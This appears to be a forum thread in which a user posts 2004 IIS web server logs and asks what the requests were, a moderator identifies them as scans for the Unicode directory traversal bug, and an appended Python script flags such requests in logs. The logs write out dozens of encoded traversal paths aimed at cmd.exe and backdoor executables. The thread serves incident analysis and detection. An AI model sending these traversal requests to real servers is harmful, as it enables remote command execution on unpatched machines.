  1. #1

    Intrusion attempt: look at these logs

    all it takes is leaving IIS running and disabling the firewalls on a win2000 machine without all the security updates

    but can anyone tell me what exactly they tried to do?


    Log1:
    01:08:07 62.211.198.96 HEAD /Default.asp 200
    01:08:07 62.211.198.96 HEAD /MSADC/root.exe 404
    01:08:14 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:14 62.211.198.96 HEAD /c/winnt/system32/cmd.exe 404
    01:08:14 62.211.198.96 HEAD /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
    01:08:16 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:16 62.211.198.96 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    01:08:17 62.211.198.96 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    01:08:17 62.211.198.96 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    01:08:17 62.211.198.96 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    01:08:17 62.211.198.96 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    01:08:18 62.211.198.96 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
    01:08:18 62.211.198.96 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
    01:08:18 62.211.198.96 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    01:08:20 62.211.198.96 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
    01:08:20 62.211.198.96 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    01:08:21 62.211.198.96 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
    01:08:21 62.211.198.96 HEAD /msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe 500
    01:08:22 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:26 62.211.198.96 HEAD /msadc/..o../winnt/system32/cmd.exe 404
    01:08:26 62.211.198.96 HEAD /msadc/..%pc../..%pc../..%pc../winnt/system32/cmd.exe 500
    01:08:27 62.211.198.96 HEAD /msadc/..%pc../winnt/system32/cmd.exe 500
    01:08:27 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:37 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:37 62.211.198.96 HEAD /msadc/..../..../..../winnt/system32/cmd.exe 404
    01:08:38 62.211.198.96 HEAD /msadc/..../winnt/system32/cmd.exe 404
    01:08:38 62.211.198.96 HEAD /msadc/..../..../..../winnt/system32/cmd.exe 404
    01:08:39 62.211.198.96 HEAD /msadc/..../winnt/system32/cmd.exe 404
    01:08:43 62.211.198.96 HEAD /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    01:08:43 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:44 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:44 62.211.198.96 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe 404
    01:08:45 62.211.198.96 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
    01:08:45 62.211.198.96 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
    01:08:45 62.211.198.96 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
    01:08:46 62.211.198.96 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
    01:08:46 62.211.198.96 HEAD /scripts/..%2f../winnt/system32/cmd.exe 404
    01:08:46 62.211.198.96 HEAD /scripts/..%5c%5c../winnt/system32/cmd.exe 404
    01:08:48 62.211.198.96 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 404
    01:08:48 62.211.198.96 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
    01:08:48 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:49 62.211.198.96 HEAD /scripts/........winnt/system32/cmd.exe 404
    01:08:53 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:53 62.211.198.96 HEAD /scripts/..%9v../winnt/system32/cmd.exe 404
    01:08:53 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:54 62.211.198.96 HEAD /scripts/..%qf../winnt/system32/cmd.exe 404
    01:08:54 62.211.198.96 HEAD /scripts/..../winnt/system32/cmd.exe 404
    01:08:55 62.211.198.96 HEAD /scripts/..%8s../winnt/system32/cmd.exe 404
    01:08:55 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:56 62.211.198.96 HEAD /scripts/..o../winnt/system32/cmd.exe 404
    01:08:56 62.211.198.96 HEAD /scripts/..%pc../winnt/system32/cmd.exe 404
    01:08:56 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:57 62.211.198.96 HEAD /scripts/..../winnt/system32/cmd.exe 404
    01:09:01 62.211.198.96 HEAD /scripts/..../winnt/system32/cmd.exe 404
    01:09:01 62.211.198.96 HEAD /scripts/..../winnt/system32/cmd.exe 404
    01:09:01 62.211.198.96 HEAD /scripts/root.exe 404
    01:09:02 62.211.198.96 HEAD /msadc/..../..../..../winnt/system32/cmd.exe 404


    Log2:
    00:07:57 147.226.208.134 GET / 403
    00:07:59 147.226.208.134 SEARCH / 411
    00:30:06 80.236.61.97 GET / 403
    00:30:09 80.236.61.97 SEARCH / 411
    00:46:07 207.177.30.175 GET / 403
    00:46:10 207.177.30.175 SEARCH / 411
    00:56:02 213.42.2.26 GET / 403
    01:12:41 137.140.136.150 GET / 403
    01:12:43 137.140.136.150 SEARCH / 411
    01:32:09 68.74.72.31 GET / 403
    01:32:11 68.74.72.31 SEARCH / 411
    02:10:49 132.170.34.157 GET / 403
    02:10:51 132.170.34.157 SEARCH / 411
    02:59:39 219.140.60.13 GET /default.ida 404
    03:20:00 200.74.183.181 GET /.hash=3ada34511dd13b28eb8ed1c3a827de603bad6051 404
    04:20:30 4.12.42.19 GET / 403
    04:20:32 4.12.42.19 SEARCH / 411
    04:43:00 68.191.110.223 GET / 403
    04:43:02 68.191.110.223 SEARCH / 411
    05:07:28 131.104.193.206 GET / 403
    05:07:31 131.104.193.206 SEARCH / 411
    05:13:15 63.172.48.66 GET / 403
    05:13:16 63.172.48.66 SEARCH / 411
    07:24:46 213.103.221.222 GET /.hash=3ada34511dd13b28eb8ed1c3a827de603bad6051 404
    07:40:24 212.133.129.21 GET /.hash=3ada34511dd13b28eb8ed1c3a827de603bad6051 404
    08:30:56 4.12.35.155 GET / 403
    08:30:57 4.12.35.155 SEARCH / 411
    08:37:15 216.96.14.33 GET / 403
    08:37:16 216.96.14.33 SEARCH / 411
    09:53:27 144.134.193.68 GET / 403
    09:53:28 144.134.193.68 SEARCH / 411
    10:28:12 68.249.140.95 GET / 403
    10:28:12 68.249.140.95 SEARCH / 411
    11:05:29 220.159.51.97 GET / 403
    11:05:30 220.159.51.97 SEARCH / 411
    11:16:52 218.59.125.155 GET / 403
    11:16:53 218.59.125.155 SEARCH / 411
    11:45:13 147.46.57.138 GET / 403
    11:45:13 147.46.57.138 SEARCH / 411

    Log3:
    #Software: Microsoft Internet Information Services 5.0
    #Version: 1.0
    #Date: 2004-01-27 18:03:50
    #Fields: time c-ip cs-method cs-uri-stem sc-status
    18:03:50 200.194.208.6 GET /sumthin 404

    Log4:
    #Software: Microsoft Internet Information Services 5.0
    #Version: 1.0
    #Date: 2004-01-26 04:35:55
    #Fields: time c-ip cs-method cs-uri-stem sc-status
    04:35:55 151.38.185.203 GET /default.ida 404
    05:52:10 151.38.185.203 GET /default.ida 404
    11:38:00 194.185.242.14 GET /scripts/nsiislog.dll 404

  2. #2
    Log5:
    #Software: Microsoft Internet Information Services 5.0
    #Version: 1.0
    #Date: 2004-01-28 20:16:57
    #Fields: time c-ip cs-method cs-uri-stem sc-status
    20:16:57 195.175.132.251 GET /.hash=cdf550d8af3be8c27b517fdc62dae5460ef6e351 404
    20:22:42 195.175.132.251 GET /.hash=cdf550d8af3be8c27b517fdc62dae5460ef6e351 404
    21:22:30 218.200.216.10 GET /scripts/nsiislog.dll 404
    22:13:27 82.84.68.228 CONNECT - 501
    22:14:06 82.84.68.228 CONNECT - 501
    22:14:45 82.84.68.228 CONNECT - 501
    22:17:00 82.84.68.228 CONNECT - 501


    Log7:
    #Software: Microsoft Internet Information Services 5.0
    #Version: 1.0
    #Date: 2004-02-05 00:15:32
    #Fields: time c-ip cs-method cs-uri-stem sc-status


  3. #3
    Log6:
    09:47:33 212.154.48.59 HEAD / 403
    09:47:35 212.154.48.59 HEAD /c/winnt/system32/cmd.exe 404
    09:47:36 212.154.48.59 HEAD /d/winnt/system32/cmd.exe 404
    09:47:41 212.154.48.59 HEAD /c/windows/system32/cmd.exe 404
    09:47:42 212.154.48.59 HEAD /d/windows/system32/cmd.exe 404
    09:47:43 212.154.48.59 HEAD /MSADC/root.exe 404
    09:47:44 212.154.48.59 HEAD /MSADC/cmd1.exe 404
    09:47:46 212.154.48.59 HEAD /MSADC/cmd2.exe 404
    09:47:47 212.154.48.59 HEAD /MSADC/blackbeard.exe 404
    09:47:48 212.154.48.59 HEAD /MSADC/serverdata.exe 404
    09:47:49 212.154.48.59 HEAD /MSADC/superlol.exe 404
    09:47:49 212.154.48.59 HEAD /MSADC/sensepost.exe 404
    09:47:51 212.154.48.59 HEAD /MSADC/shell.exe 404
    09:47:52 212.154.48.59 HEAD /MSADC/exchange.exe 404
    09:47:57 212.154.48.59 HEAD /scripts/root.exe 404
    09:48:03 212.154.48.59 HEAD /scripts/cmd1.exe 404
    09:48:05 212.154.48.59 HEAD /scripts/cmd2.exe 404
    09:48:06 212.154.48.59 HEAD /scripts/blackbeard.exe 404
    09:48:07 212.154.48.59 HEAD /scripts/serverdata.exe 404
    09:48:09 212.154.48.59 HEAD /scripts/superlol.exe 404
    09:48:10 212.154.48.59 HEAD /scripts/sensepost.exe 404
    09:48:11 212.154.48.59 HEAD /scripts/shell.exe 404
    09:48:12 212.154.48.59 HEAD /scripts/exchange.exe 404
    09:48:14 212.154.48.59 HEAD /exchange/root.exe 404
    09:48:15 212.154.48.59 HEAD /exchange/cmd1.exe 404
    09:48:16 212.154.48.59 HEAD /exchange/cmd2.exe 404
    09:48:18 212.154.48.59 HEAD /exchange/blackbeard.exe 404
    09:48:22 212.154.48.59 HEAD /exchange/serverdata.exe 404
    09:48:29 212.154.48.59 HEAD /exchange/superlol.exe 404
    09:48:29 212.154.48.59 HEAD /exchange/sensepost.exe 404
    09:48:32 212.154.48.59 HEAD /exchange/shell.exe 404
    09:48:33 212.154.48.59 HEAD /exchange/exchange.exe 404
    09:48:35 212.154.48.59 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:36 212.154.48.59 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:37 212.154.48.59 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:41 212.154.48.59 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:43 212.154.48.59 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:44 212.154.48.59 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:45 212.154.48.59 HEAD /Rpc/..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:47 212.154.48.59 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:48 212.154.48.59 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:48 212.154.48.59 HEAD /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
    09:48:50 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:48:51 212.154.48.59 HEAD /_mem_bin/..%9v..%9v..%9v../winnt/system32/cmd.exe 404
    09:48:52 212.154.48.59 HEAD /_mem_bin/......../winnt/system32/cmd.exe 404
    09:48:52 212.154.48.59 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
    09:48:54 212.154.48.59 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
    09:48:54 212.154.48.59 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
    09:48:56 212.154.48.59 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
    09:48:58 212.154.48.59 HEAD /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
    09:48:59 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:00 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:01 212.154.48.59 HEAD /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:49:02 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:04 212.154.48.59 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:49:05 212.154.48.59 HEAD /adsamples/..%5c%5c..%5c%5c..%5c%5c..%5c%5c..%5c%5c../winnt/system32/cmd.exe 404
    09:49:06 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:07 212.154.48.59 HEAD /adsamples/............/winnt/system32/cmd.exe 404
    09:49:09 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:10 212.154.48.59 HEAD /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:49:11 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:11 212.154.48.59 HEAD /cgi-bin/..%qf../..%qf../..%qf../winnt/system32/cmd.exe 404
    09:49:13 212.154.48.59 HEAD /cgi-bin/..../..../..../winnt/system32/cmd.exe 404
    09:49:13 212.154.48.59 HEAD /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
    09:49:15 212.154.48.59 HEAD /iisadmpwd/..%5c%5c..%5c%5c..%5c%5c..%5c%5c..%5c%5c../winnt/system32/cmd.exe 404
    09:49:15 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:16 212.154.48.59 HEAD /iisadmpwd/............/winnt/system32/cmd.exe 404
    09:49:16 212.154.48.59 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    09:49:18 212.154.48.59 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    09:49:20 212.154.48.59 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    09:49:22 212.154.48.59 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    09:49:25 212.154.48.59 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
    09:49:26 212.154.48.59 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
    09:49:27 212.154.48.59 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    09:49:28 212.154.48.59 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
    09:49:29 212.154.48.59 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    09:49:29 212.154.48.59 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
    09:49:31 212.154.48.59 HEAD /msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe 500
    09:49:31 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:33 212.154.48.59 HEAD /msadc/..o../winnt/system32/cmd.exe 404
    09:49:33 212.154.48.59 HEAD /msadc/..%pc../..%pc../..%pc../winnt/system32/cmd.exe 500
    09:49:34 212.154.48.59 HEAD /msadc/..%pc../winnt/system32/cmd.exe 500
    09:49:36 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:37 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:39 212.154.48.59 HEAD /msadc/..../..../..../winnt/system32/cmd.exe 404
    09:49:40 212.154.48.59 HEAD /msadc/..../winnt/system32/cmd.exe 404
    09:49:43 212.154.48.59 HEAD /msadc/..../..../..../winnt/system32/cmd.exe 404
    09:49:46 212.154.48.59 HEAD /msadc/..../winnt/system32/cmd.exe 404
    09:49:47 212.154.48.59 HEAD /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:49:50 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:51 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:53 212.154.48.59 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe 404
    09:49:54 212.154.48.59 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
    09:50:05 212.154.48.59 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
    09:50:08 212.154.48.59 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
    09:50:09 212.154.48.59 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
    09:50:14 212.154.48.59 HEAD /scripts/..%2f../winnt/system32/cmd.exe 404
    09:50:16 212.154.48.59 HEAD /scripts/..%5c%5c../winnt/system32/cmd.exe 404
    09:50:17 212.154.48.59 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 404
    09:50:18 212.154.48.59 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
    09:50:18 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:20 212.154.48.59 HEAD /scripts/........winnt/system32/cmd.exe 404
    09:50:22 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:23 212.154.48.59 HEAD /scripts/..%9v../winnt/system32/cmd.exe 404
    09:50:24 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:25 212.154.48.59 HEAD /scripts/..%qf../winnt/system32/cmd.exe 404
    09:50:25 212.154.48.59 HEAD /scripts/..../winnt/system32/cmd.exe 404
    09:50:27 212.154.48.59 HEAD /scripts/..%8s../winnt/system32/cmd.exe 404
    09:50:27 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:29 212.154.48.59 HEAD /scripts/..o../winnt/system32/cmd.exe 404
    09:50:30 212.154.48.59 HEAD /scripts/..%pc../winnt/system32/cmd.exe 404
    09:50:32 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:34 212.154.48.59 HEAD /scripts/..../winnt/system32/cmd.exe 404
    09:50:35 212.154.48.59 HEAD /scripts/..../winnt/system32/cmd.exe 404
    09:50:35 212.154.48.59 HEAD /scripts/..../winnt/system32/cmd.exe 404
    09:50:37 212.154.48.59 HEAD /srchadmin/............/winnt/system32/cmd.exe 404
    09:50:37 212.154.48.59 HEAD /srchadmin/..%5c%5c..%5c%5c..%5c%5c..%5c%5c..%5c%5c../winnt/system32/cmd.exe 404
    09:50:39 212.154.48.59 HEAD /srchadmin/..%pc..%pc..%pc..%pc..%pc../winnt/system32/cmd.exe 404
    09:50:39 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:41 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:41 212.154.48.59 HEAD /exchange/winnt/system32/cmd.exe 404
    09:50:43 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:43 212.154.48.59 HEAD /exchange/..../..../..../winnt/system32/cmd.exe 404
    09:50:44 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:44 212.154.48.59 HEAD /_vti_bin/root.exe 404
    09:50:46 212.154.48.59 HEAD /_vti_bin/cmd1.exe 404
    09:50:46 212.154.48.59 HEAD /_vti_bin/cmd2.exe 404
    09:50:48 212.154.48.59 HEAD /_vti_bin/blackbeard.exe 404
    09:50:48 212.154.48.59 HEAD /_vti_bin/serverdata.exe 404
    09:50:50 212.154.48.59 HEAD /_vti_bin/superlol.exe 404
    09:50:50 212.154.48.59 HEAD /_vti_bin/sensepost.exe 404
    09:50:52 212.154.48.59 HEAD /_vti_bin/shell.exe 404
    09:50:53 212.154.48.59 HEAD /_vti_bin/exchange.exe 404
    09:50:53 212.154.48.59 HEAD /pbserver/root.exe 404
    09:50:54 212.154.48.59 HEAD /pbserver/cmd1.exe 404
    09:50:54 212.154.48.59 HEAD /pbserver/cmd2.exe 404
    09:50:56 212.154.48.59 HEAD /pbserver/blackbeard.exe 404
    09:50:56 212.154.48.59 HEAD /pbserver/serverdata.exe 404
    09:50:59 212.154.48.59 HEAD /pbserver/superlol.exe 404
    09:51:00 212.154.48.59 HEAD /pbserver/sensepost.exe 404
    09:51:01 212.154.48.59 HEAD /pbserver/shell.exe 404
    09:51:02 212.154.48.59 HEAD /pbserver/exchange.exe 404
    09:51:04 212.154.48.59 HEAD /cgi-bin/root.exe 404
    09:51:05 212.154.48.59 HEAD /cgi-bin/cmd1.exe 404
    09:51:07 212.154.48.59 HEAD /cgi-bin/cmd2.exe 404
    09:51:09 212.154.48.59 HEAD /cgi-bin/blackbeard.exe 404
    09:51:10 212.154.48.59 HEAD /cgi-bin/serverdata.exe 404
    09:51:12 212.154.48.59 HEAD /cgi-bin/superlol.exe 404
    09:51:13 212.154.48.59 HEAD /cgi-bin/sensepost.exe 404
    09:51:17 212.154.48.59 HEAD /cgi-bin/shell.exe 404
    09:51:18 212.154.48.59 HEAD /cgi-bin/exchange.exe 404
    09:51:18 212.154.48.59 HEAD /rpc/root.exe 404
    09:51:20 212.154.48.59 HEAD /rpc/cmd1.exe 404
    09:51:20 212.154.48.59 HEAD /rpc/cmd2.exe 404
    09:51:22 212.154.48.59 HEAD /rpc/blackbeard.exe 404
    09:51:23 212.154.48.59 HEAD /rpc/serverdata.exe 404
    09:51:24 212.154.48.59 HEAD /rpc/superlol.exe 404
    09:51:26 212.154.48.59 HEAD /rpc/sensepost.exe 404
    09:51:27 212.154.48.59 HEAD /rpc/shell.exe 404
    09:51:29 212.154.48.59 HEAD /rpc/exchange.exe 404
    09:51:30 212.154.48.59 HEAD /iisadmpwd/root.exe 404
    09:51:31 212.154.48.59 HEAD /iisadmpwd/cmd1.exe 404
    09:51:32 212.154.48.59 HEAD /iisadmpwd/cmd2.exe 404
    09:51:34 212.154.48.59 HEAD /iisadmpwd/blackbeard.exe 404
    09:51:35 212.154.48.59 HEAD /iisadmpwd/serverdata.exe 404
    09:51:35 212.154.48.59 HEAD /iisadmpwd/superlol.exe 404
    09:51:37 212.154.48.59 HEAD /iisadmpwd/sensepost.exe 404
    09:51:37 212.154.48.59 HEAD /iisadmpwd/shell.exe 404
    09:51:39 212.154.48.59 HEAD /iisadmpwd/exchange.exe 404
    09:51:41 212.154.48.59 HEAD /_vti_cnf/root.exe 404
    09:51:42 212.154.48.59 HEAD /_vti_cnf/cmd1.exe 404
    09:51:42 212.154.48.59 HEAD /_vti_cnf/cmd2.exe 404
    09:51:44 212.154.48.59 HEAD /_vti_cnf/blackbeard.exe 404
    09:51:44 212.154.48.59 HEAD /_vti_cnf/serverdata.exe 404
    09:51:46 212.154.48.59 HEAD /_vti_cnf/superlol.exe 404
    09:51:46 212.154.48.59 HEAD /_vti_cnf/sensepost.exe 404
    09:51:48 212.154.48.59 HEAD /_vti_cnf/shell.exe 404
    09:51:49 212.154.48.59 HEAD /_vti_cnf/exchange.exe 404
    09:51:50 212.154.48.59 HEAD /adsamples/root.exe 404
    09:51:51 212.154.48.59 HEAD /adsamples/cmd1.exe 404
    09:51:52 212.154.48.59 HEAD /adsamples/cmd2.exe 404
    09:51:53 212.154.48.59 HEAD /adsamples/blackbeard.exe 404
    09:51:55 212.154.48.59 HEAD /adsamples/superlol.exe 404
    09:51:56 212.154.48.59 HEAD /adsamples/sensepost.exe 404
    09:51:57 212.154.48.59 HEAD /adsamples/shell.exe 404
    09:51:59 212.154.48.59 HEAD /adsamples/exchange.exe 404
    09:52:00 212.154.48.59 HEAD /srchadmin/root.exe 404
    09:52:02 212.154.48.59 HEAD /srchadmin/cmd1.exe 404
    09:52:03 212.154.48.59 HEAD /srchadmin/cmd2.exe 404
    09:52:04 212.154.48.59 HEAD /srchadmin/blackbeard.exe 404
    09:52:09 212.154.48.59 HEAD /srchadmin/shell.exe 404
    09:52:11 212.154.48.59 HEAD /srchadmin/exchange.exe 404
    09:52:12 212.154.48.59 HEAD /WWWROOT/root.exe 404
    09:52:14 212.154.48.59 HEAD /WWWROOT/cmd1.exe 404
    09:52:15 212.154.48.59 HEAD /WWWROOT/cmd2.exe 404
    09:52:16 212.154.48.59 HEAD /WWWROOT/blackbeard.exe 404
    09:52:22 212.154.48.59 HEAD /_mem_bin/root.exe 404
    09:52:23 212.154.48.59 HEAD /_mem_bin/cmd1.exe 404
    09:52:24 212.154.48.59 HEAD /_mem_bin/cmd2.exe 404

  4. #4
    Anyway, most of them got a 404 error
    Assuming the logs haven't been tampered with

    Bye

  5. #5
    Habanero (moderator of Computer security and viruses; registered since Jun 2001; 9,782 posts)
    Directory traversal using Unicode vulnerability

    This is the type of bug they were looking for. By inserting Unicode-encoded characters representing the symbols "..\", which an unpatched IIS does not filter, it is possible to access folders outside those belonging to the web server, and in particular to reach the folder where cmd.exe resides. If that happens, code can be executed on the server!

    A scan that looks for a large set of possible vulnerabilities was probably launched against your machine.
    Read the RULES!

    It's very complicated, a lot of inputs and outputs, a lot of information, a lot of elements to consider, I have a lot of elements to keep in mind...
    Drugo
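
An added example, not part of any post in this thread: a triage pass over logs in the five-field IIS format shown above. It tags each request (traversal sequence, encoded path character, malformed escape, .exe or ISAPI probe) and lists, per client IP, the flagged requests that did not return 404. The tag names, function names and the 192.0.2.10 line are assumptions made for the example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Lines copied from the logs in this thread, plus one constructed benign
# request (192.0.2.10) so the filter has something to ignore.
SAMPLE_LOG = """\
#Fields: time c-ip cs-method cs-uri-stem sc-status
01:08:07 62.211.198.96 HEAD /Default.asp 200
01:08:07 62.211.198.96 HEAD /MSADC/root.exe 404
01:08:16 62.211.198.96 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
01:08:26 62.211.198.96 HEAD /msadc/..%pc../winnt/system32/cmd.exe 500
01:08:44 62.211.198.96 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe 404
02:59:39 219.140.60.13 GET /default.ida 404
11:38:00 194.185.242.14 GET /scripts/nsiislog.dll 404
12:00:00 192.0.2.10 GET /images/logo.gif 200
"""

DEFAULT_FIELDS = ["time", "c-ip", "cs-method", "cs-uri-stem", "sc-status"]
ENCODED_PATH_CHAR = re.compile(r"%(5c|2f|2e)", re.I)  # encoded \ / .
BAD_ESCAPE = re.compile(r"%(?![0-9a-f]{2})", re.I)    # e.g. %pc, %9v, %qf


def parse(log_text):
    """Yield one dict per data line, honouring a #Fields directive if present."""
    fields = DEFAULT_FIELDS
    for line in log_text.splitlines():
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            parts = line.split()
            if len(parts) == len(fields):  # skip truncated or corrupt lines
                yield dict(zip(fields, parts))


def classify(stem):
    """Return the set of suspicious traits found in one cs-uri-stem value."""
    tags = set()
    # Decode once and treat backslash as a separator, as Windows does.
    # unquote() leaves malformed escapes such as %pc untouched.
    decoded = unquote(stem).replace("\\", "/").lower()
    if ".." in decoded:
        tags.add("traversal")
    if ENCODED_PATH_CHAR.search(stem):
        tags.add("encoded-path-char")
    if BAD_ESCAPE.search(stem):
        tags.add("malformed-escape")
    if decoded.endswith(".exe"):
        tags.add("exe-request")
    if decoded.endswith((".ida", "/nsiislog.dll")):
        tags.add("isapi-probe")
    return tags


def triage(log_text):
    """Per client IP: tag counts, plus flagged requests that were not a 404."""
    report = defaultdict(lambda: {"tags": Counter(), "non404": []})
    for rec in parse(log_text):
        tags = classify(rec["cs-uri-stem"])
        if not tags:
            continue
        entry = report[rec["c-ip"]]
        entry["tags"].update(tags)
        if rec["sc-status"] != "404":
            entry["non404"].append(
                (rec["time"], rec["cs-uri-stem"], rec["sc-status"]))
    return dict(report)


if __name__ == "__main__":
    for ip, entry in triage(SAMPLE_LOG).items():
        print(ip, dict(entry["tags"]))
        for hit in entry["non404"]:
            print("   review:", *hit)
```

The `non404` list is the part to read first: in the logs above it would surface the `/msadc/` requests answered with 500 rather than 404.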
